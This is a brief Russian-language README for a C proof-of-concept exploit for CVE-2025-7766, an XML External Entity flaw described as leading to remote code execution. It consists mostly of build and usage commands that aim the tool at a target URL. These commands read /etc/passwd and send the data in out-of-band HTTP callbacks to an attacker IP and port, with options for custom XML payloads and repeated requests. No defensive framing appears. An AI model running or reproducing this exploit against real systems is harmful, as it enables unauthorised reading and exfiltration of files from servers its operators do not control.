
C-эксплойт PoC для CVE-2025-7766, демонстрирующий XXE-to-RCE посредством чтения файлов и внеполосных HTTP-обратных вызовов. Поддерживает пользовательские XML-нагрузки и повторные запросы.
PoC для эксплуатации уязвимости XML External Entity в CVE-2025-7766. Демонстрирует чтение файла (/etc/passwd) и внеполосные HTTP-обратные вызовы.
Автор: Byte Reaper
CVE: CVE-2025-7766
Уязвимость: Удаленное выполнение кода через XML External Entity (XXE)
/etc/passwd с целевого хоста.gcc -o exploit exploit.c argparse.c -lcurl
# Полезная нагрузка для чтения файла
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# Полезная нагрузка для внеполосного запроса
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# Пользовательская полезная нагрузка
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# Повторить запросы 5 раз
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# Подробный вывод
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT